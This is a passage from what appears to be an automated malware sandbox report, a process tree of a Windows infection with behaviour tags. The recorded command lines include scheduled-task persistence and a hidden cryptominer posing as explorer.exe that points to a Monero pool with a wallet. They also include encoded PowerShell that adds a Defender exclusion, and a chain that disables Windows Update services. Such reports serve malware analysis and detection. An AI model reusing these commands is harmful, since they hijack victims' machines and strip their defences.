C:\Users\Admin\AppData\Local\Temp\liyong.exe
"C:\Users\Admin\AppData\Local\Temp\liyong.exe" help
6⤵
PID:412

C:\Users\Admin\AppData\Local\Temp\rtst1077.exe
"C:\Users\Admin\AppData\Local\Temp\rtst1077.exe"
5⤵
PID:5036

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5036 -s 900
6⤵
- Program crash
PID:5032

C:\Users\Admin\AppData\Local\Temp\handselfdiy_8.exe
"C:\Users\Admin\AppData\Local\Temp\handselfdiy_8.exe"
5⤵
PID:4072

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:1736

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:4168

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
6⤵
PID:4852

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd41244f50,0x7ffd41244f60,0x7ffd41244f70
7⤵
PID:1636

C:\Users\Admin\AppData\Local\Temp\inst002.exe
"C:\Users\Admin\AppData\Local\Temp\inst002.exe"
5⤵
- Executes dropped EXE
PID:2592

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_216.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_216.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:4576

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" -y .\B_~R3N.4n
6⤵
- Loads dropped DLL
PID:3320

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3520

C:\Users\Admin\AppData\Local\Temp\dTM6LzMpsfjjW\Application373.exe
C:\Users\Admin\AppData\Local\Temp\dTM6LzMpsfjjW\Application373.exe
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:5036

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" "--uOyLnaD1"
7⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3764

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Routes\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Routes\User Data" --annotation=plat=Win64 --annotation=prod=Routes --annotation=ver=0.0.13 --initial-client-data=0x220,0x224,0x228,0xd8,0x22c,0x7ffd46e3dec0,0x7ffd46e3ded0,0x7ffd46e3dee0
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4188

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Routes\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Routes --annotation=ver=0.0.13 --initial-client-data=0x148,0x14c,0x150,0x124,0x154,0x7ff6a33f9e70,0x7ff6a33f9e80,0x7ff6a33f9e90
9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2904

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1596,2879432380570864779,9151905981805025403,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3764_2035613163" --mojo-platform-channel-handle=1824 /prefetch:8
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:3920

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1596,2879432380570864779,9151905981805025403,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3764_2035613163" --mojo-platform-channel-handle=2132 /prefetch:8
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1948

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1596,2879432380570864779,9151905981805025403,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3764_2035613163" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1612 /prefetch:2
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:4792

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,2879432380570864779,9151905981805025403,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3764_2035613163" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2588 /prefetch:1
8⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:4748

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,2879432380570864779,9151905981805025403,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3764_2035613163" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2612 /prefetch:1
8⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:4336

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1596,2879432380570864779,9151905981805025403,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3764_2035613163" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3336 /prefetch:2
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:4888

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,2879432380570864779,9151905981805025403,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3764_2035613163" --mojo-platform-channel-handle=2028 /prefetch:8
8⤵
PID:3508

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,2879432380570864779,9151905981805025403,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3764_2035613163" --mojo-platform-channel-handle=4040 /prefetch:8
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4372

C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,2879432380570864779,9151905981805025403,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3764_2035613163" --mojo-platform-channel-handle=4032 /prefetch:8
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3684

C:\Users\Admin\AppData\Local\Temp\anytime6.exe
"C:\Users\Admin\AppData\Local\Temp\anytime6.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:1608

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
6⤵
PID:4988

C:\Users\Admin\AppData\Local\Temp\Chrome3.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
7⤵
- Executes dropped EXE
PID:4276

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
8⤵
PID:1448

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
9⤵
PID:4500

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
10⤵
- Creates scheduled task(s)
PID:1512

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
9⤵
PID:2868

C:\Users\Admin\AppData\Roaming\services64.exe
C:\Users\Admin\AppData\Roaming\services64.exe
10⤵
- Executes dropped EXE
PID:2372

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
11⤵
PID:1452

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
12⤵
PID:3480

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.akh3/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6Dvl0gIbiYyxigXSfnBYotXJ0yRecaUeAIZEOUyK4WML" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
12⤵
PID:1792

C:\Users\Admin\AppData\Local\Temp\logger2.exe
"C:\Users\Admin\AppData\Local\Temp\logger2.exe"
7⤵
- Executes dropped EXE
PID:1864

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1864 -s 1604
8⤵
- Program crash
PID:3840

C:\Users\Admin\AppData\Local\Temp\anytime7.exe
"C:\Users\Admin\AppData\Local\Temp\anytime7.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:2544

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
6⤵
PID:3416

C:\Users\Admin\AppData\Local\Temp\Chrome3.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
7⤵
- Executes dropped EXE
PID:2020

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
8⤵
PID:4292

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
9⤵
PID:3624

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
10⤵
- Creates scheduled task(s)
PID:1496

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
9⤵
PID:4492

C:\Users\Admin\AppData\Roaming\services64.exe
C:\Users\Admin\AppData\Roaming\services64.exe
10⤵
- Executes dropped EXE
PID:1960

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
11⤵
PID:3028

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.akh3/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6Dvl0gIbiYyxigXSfnBYotXJ0yRecaUeAIZEOUyK4WML" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
12⤵
PID:488

C:\Users\Admin\AppData\Local\Temp\logger2.exe
"C:\Users\Admin\AppData\Local\Temp\logger2.exe"
7⤵
- Executes dropped EXE
PID:1932

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1932 -s 1600
8⤵
- Program crash
PID:4856

C:\Users\Admin\AppData\Local\Temp\logger2.exe
"C:\Users\Admin\AppData\Local\Temp\logger2.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:2472

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
6⤵
PID:2908

C:\Users\Admin\AppData\Local\Temp\Chrome3.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
7⤵
- Executes dropped EXE
PID:4184

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
8⤵
PID:1908

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
9⤵
PID:1364

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
10⤵
- Creates scheduled task(s)
PID:3300

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
9⤵
PID:1652

C:\Users\Admin\AppData\Roaming\services64.exe
C:\Users\Admin\AppData\Roaming\services64.exe
10⤵
- Executes dropped EXE
PID:2568

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
11⤵
PID:2012

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
12⤵
PID:928

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.akh3/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6Dvl0gIbiYyxigXSfnBYotXJ0yRecaUeAIZEOUyK4WML" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
12⤵
PID:4396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 1520
7⤵
- Program crash
PID:3464

C:\Users\Admin\Pictures\Adobe Films\njtxLurSSstAnBp60ScL4OzD.exe
"C:\Users\Admin\Pictures\Adobe Films\njtxLurSSstAnBp60ScL4OzD.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 2020
3⤵
- Program crash
PID:1068

C:\Users\Admin\Pictures\Adobe Films\zHHMLouApJwoLxDCuvVJ1LGE.exe
"C:\Users\Admin\Pictures\Adobe Films\zHHMLouApJwoLxDCuvVJ1LGE.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2960 -ip 2960
1⤵
PID:1184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4580 -ip 4580
1⤵
PID:3760

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 416 -p 1012 -ip 1012
1⤵
PID:2836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4580 -ip 4580
1⤵
PID:2156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4580 -ip 4580
1⤵
PID:1084

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:116

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
PID:4596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 600
3⤵
- Program crash
PID:3696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4580 -ip 4580
1⤵
PID:1184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4596 -ip 4596
1⤵
PID:4772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4580 -ip 4580
1⤵
PID:4988

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 476 -p 5036 -ip 5036
1⤵
PID:1740

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:3124

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
- Loads dropped DLL
PID:2820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 600
3⤵
- Program crash
PID:4604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4536

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:2656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4580 -ip 4580
1⤵
PID:1932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2820 -ip 2820
1⤵
PID:4736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2908 -ip 2908
1⤵
PID:1512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4580 -ip 4580
1⤵
PID:3476

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 508 -p 1932 -ip 1932
1⤵
- Suspicious use of WriteProcessMemory
PID:116

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 524 -p 1864 -ip 1864
1⤵
PID:3592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4580 -ip 4580
1⤵
PID:2152

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:3928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4580 -ip 4580
1⤵
PID:3172

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4012

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1304

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2552

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:752

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4168

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:4072

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4532

C:\Users\Admin\AppData\Roaming\hfwjjfg
C:\Users\Admin\AppData\Roaming\hfwjjfg
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 328 -ip 328
1⤵
PID:4148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 328 -ip 328
1⤵
PID:3476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 328 -ip 328
1⤵
PID:2300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 328 -ip 328
1⤵
PID:4220

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:412

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
1⤵
- Executes dropped EXE
PID:3384

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe"
2⤵
- Suspicious use of SetThreadContext
PID:1932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG8AYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AGEAaQBtACMAPgA="
3⤵
PID:2212

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:1764

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:684

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1812

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:3092

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:3124

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "pproonliew"
3⤵
PID:3668

C:\Windows\explorer.exe
